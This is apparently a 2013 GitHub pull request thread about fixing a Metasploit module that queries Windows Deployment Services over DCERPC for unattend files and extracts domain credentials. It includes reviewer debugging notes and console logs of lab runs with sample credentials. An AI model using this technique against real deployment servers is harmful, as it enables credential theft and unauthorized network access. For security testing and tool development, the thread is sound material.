Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Windows Deployment Services (x86) #2511

Closed
wants to merge 5 commits into from
Closed

Windows Deployment Services (x86) #2511

wants to merge 5 commits into from

Conversation

Meatballs1
Copy link
Contributor

@todb-r7

There's really no point supporting NDR64 syntax as x64 systems will talk NDR32 without issue. So dropped back to the default syntax and corrected the module. Also performed various tidyup tasks after ~12 months more MSF dev experience.

Should play nicely with 2k3 x86 -> 2k8 x64 and I assume 2k12...

@Meatballs1
Use NDR 32bit syntax.
cad717a 
Compatible with both x86 and x64 systems.
Tidy up the module...
@Meatballs1
Randomize client variables
765b551 
Also tidyup indents and use predefined UUID syntax.
@Meatballs1
Dont define the NDR syntax
988ac68
@todb-r7
Copy link

todb-r7 commented Oct 14, 2013

Related to #1420

@todb-r7
Copy link

todb-r7 commented Oct 14, 2013

So, sometimes I get this:

[-] 192.168.145.60:5040 error: undefined method `+' for nil:NilClass

I think there are a couple over-eager rescues in here.

Also, I often end up with a bunch of open connections. When the module ends, I'm still left with:

$ netstat -an | grep 5040
tcp     1256      0 192.168.145.1:33567     192.168.145.60:5040     ESTABLISHED

Normally, hanging connections like this get handled with cleanup but again, I bet the rescues are munging that up.

Here's a more normal run:

[*] Binding to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0@ncacn_ip_tcp:192.168.145.60[5040] ...
[+] Bound to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0@ncacn_ip_tcp:192.168.145.60[5040]
[*] Sending X64 Client Unattend request ...
[*] Received response ...
[-] Error code received for X64: 26210
[*] Sending X86 Client Unattend request ...
[*] Sending IA64 Client Unattend request ...
[*] Received response ...
[-] Error code received for IA64: 26210
[*] Skipping ARM architecture due to adv option
[-] No Unattend files received, service is unlikely to be configured for completely unattended installation.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

and now I have another connection:

$ netstat -an | grep 5040
tcp     1256      0 192.168.145.1:33567     192.168.145.60:5040     ESTABLISHED
tcp     1544      0 192.168.145.1:56180     192.168.145.60:5040     ESTABLISHED

Going to see what I can do to detangle this.

@todb-r7
Copy link

todb-r7 commented Oct 14, 2013

It feels like when you open the DCERPC connection to WDS, if you never close it, that WDS server is out of the unattend.xml-serving business.

@todb-r7
Copy link

todb-r7 commented Oct 14, 2013

This is on my Wink2k3 machine, btw.

@todb-r7
Copy link

todb-r7 commented Oct 14, 2013

By the way, the + rescue isn't consistent. Here's a good run, after restarting WDS:

[*] Binding to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0@ncacn_ip_tcp:192.168.145.60[5040] ...
[+] Bound to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0@ncacn_ip_tcp:192.168.145.60[5040]
[*] Sending X64 Client Unattend request ...
[*] Received response ...
[*] Received X64 unattend file ...
[*] Raw version of X64 saved as: /home/todb/.msf4/loot/20131014121544_default_192.168.145.60_windows.unattend_224027.txt
[+] Retrived wds credentials for X64
[*] Sending X86 Client Unattend request ...
[*] Received response ...
[-] Error code received for X86: 26210
[*] Sending IA64 Client Unattend request ...
[*] Skipping ARM architecture due to adv option

Windows Deployment Services
===========================

 Architecture  Type  Domain        Username         Password
 ------------  ----  ------        --------         --------
 X64           wds   Fabrikam.com  my_username-x64  my_password-x64

@todb-r7
Copy link

todb-r7 commented Oct 14, 2013

So, it looks like for each arch, you need to set up the handle, get the file, and then tear down the handle.

@todb-r7
Copy link

todb-r7 commented Oct 14, 2013

Sometimes, the returned data (dcerpc.last_response.stub_data) gets chopped off. Hmm. Here's an inspect:

[!] "D\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x18\t\x00\x00\x00\x00\x00\x00<?xml version=\"1.0\" ?> \r\n<unattend xmlns=\"urn:schemas-microsoft-com:unattend\">\r\n   <settings pass=\"windowsPE\">\r\n      <component name=\"Microsoft-Windows-Setup\" publicKeyToken=\"31bf3856ad364e35\" \r\nlanguage=\"neutral\" versionScope=\"nonSxS\" processorArchitecture=\"x86\">\r\n         <WindowsDeploymentServices>\r\n            <Login>\r\n               <WillShowUI>OnError</WillShowUI>\r\n               <Credentials>\r\n                     <Username>my_username-x64</Username>\r\n                     <Domain>Fabrikam.com</Domain>\r\n                     <Password>my_password-x64</Password>\r\n                  </Credentials>\r\n               </Login>\r\n            <ImageSelection>\r\n               <WillShowUI>OnError</WillShowUI>\r\n               <InstallImage>\r\n                  <ImageName>Windows Vista with Office</ImageName>\r\n                  <ImageGroup>ImageGroup1</ImageGroup>\r\n                  <Filename>Install.wim</Filename>\r\n               </InstallImage>\r\n                  <InstallTo>\r\n                  <DiskID>0</DiskID>\r\n                  <PartitionID>1</PartitionID>\r\n               </InstallTo>\r\n            </ImageSelection>\r\n         </WindowsDeploymentServices>\r\n         <Di"

@todb-r7
Copy link

todb-r7 commented Oct 14, 2013

So, when it works, after this next commit, I often get this:

sf auxiliary(windows_deployment_services) > run

[*] Asking for architecture X64
[+] Bound to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0@ncacn_ip_tcp:192.168.145.60[5040]
[*] Sending X64 Client Unattend request ...
[*] Received response ...
[*] Received X64 unattend file ...
[*] Raw version of X64 saved as: /home/todb/.msf4/loot/20131014140239_default_192.168.145.60_windows.unattend_128972.txt
[+] Retrived wds credentials for X64
[*] Asking for architecture X86
[+] Bound to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0@ncacn_ip_tcp:192.168.145.60[5040]
[*] Sending X86 Client Unattend request ...
[*] Received response ...
[-] Error code received for X86: 26210
[*] Asking for architecture IA64
[+] Bound to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0@ncacn_ip_tcp:192.168.145.60[5040]
[*] Sending IA64 Client Unattend request ...
[*] Received response ...
[-] No Unattend received for IA64 architecture
[*] Skipping ARM architecture due to adv option

Windows Deployment Services
===========================

 Architecture  Type  Domain        Username         Password
 ------------  ----  ------        --------         --------
 X64           wds   Fabrikam.com  my_username-x64  my_password-x64

However, I often get incompletes, and it looks like the socket read is cutting off between packets. Here comes a pull request; I'm thinking we need to be slower on the RPC read in order to actually pick up the data, then close out the connection. It feels like, on Win2k3, that we're running into a locking situation on the WDS server.

@todb-r7
Copy link

todb-r7 commented Oct 14, 2013

See Meatballs1#28

@todb-r7
Copy link

todb-r7 commented Oct 14, 2013

Note that all of my problems may just boil down to my crummy 32-bit server. @Meatballs1 may have never seen these protocol snafus in 64-bit land, and this PR #2511 does indeed solve the fundamental cross-compat issues.

If I don't get any feedback on this in the next hour or so, I'll land this, and we can tinker with Meatballs1#28 in the meantime.

@todb-r7
Copy link

todb-r7 commented Oct 14, 2013

Regardless of Meatballs1#28, this PR and 50b1dd9 could be landed right now to just deal with the 32-bit RPC transfer syntax and avoid the NoMethodError on nil.

@todb-r7
Copy link

todb-r7 commented Oct 14, 2013

So, I'm still racing DCERPC, looks like, but now my sessions are at least closing cleanly. I'll land this now to get around those problems.

msf auxiliary(windows_deployment_services) > run

[*] Binding to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0@ncacn_ip_tcp:192.168.145.60[5040] ...
[+] Bound to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0@ncacn_ip_tcp:192.168.145.60[5040]
[*] Sending X64 Client Unattend request ...
[*] Received response ...
[*] Received X64 unattend file ...
[-] Incomplete transmission or malformed unattend file.
[*] Sending X86 Client Unattend request ...
[*] Sending IA64 Client Unattend request ...
[*] Received response ...
[-] Error code received for IA64: 26210
[*] Skipping ARM architecture due to adv option
[-] No Unattend files received, service is unlikely to be configured for completely unattended installation.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(windows_deployment_services) > run

[*] Binding to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0@ncacn_ip_tcp:192.168.145.60[5040] ...
[+] Bound to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0@ncacn_ip_tcp:192.168.145.60[5040]
[*] Sending X64 Client Unattend request ...
[*] Received response ...
[-] Error code received for X64: 26210
[*] Sending X86 Client Unattend request ...
[*] Sending IA64 Client Unattend request ...
[*] Received response ...
[-] Error code received for IA64: 26210
[*] Skipping ARM architecture due to adv option
[-] No Unattend files received, service is unlikely to be configured for completely unattended installation.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(windows_deployment_services) > run

[*] Binding to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0@ncacn_ip_tcp:192.168.145.60[5040] ...
[+] Bound to 1A927394-352E-4553-AE3F-7CF4AAFCA620:1.0@ncacn_ip_tcp:192.168.145.60[5040]
[*] Sending X64 Client Unattend request ...
[*] Received response ...
[*] Received X64 unattend file ...
[*] Raw version of X64 saved as: /home/todb/.msf4/loot/20131014161453_wut_192.168.145.60_windows.unattend_704127.txt
[+] Retrived wds credentials for X64
[*] Sending X86 Client Unattend request ...
[*] Received response ...
[-] Error code received for X86: 26210
[*] Sending IA64 Client Unattend request ...
[*] Skipping ARM architecture due to adv option

Windows Deployment Services
===========================

 Architecture  Type  Domain        Username         Password
 ------------  ----  ------        --------         --------
 X64           wds   Fabrikam.com  my_username-x64  my_password-x64

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(windows_deployment_services) >

todb-r7 pushed a commit that referenced this pull request Oct 14, 2013
Land #2511, fix up NoMethodError and hanging connx
14be85e
@todb-r7 todb-r7 mentioned this pull request Oct 14, 2013
Merged
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@Meatballs1 @todb-r7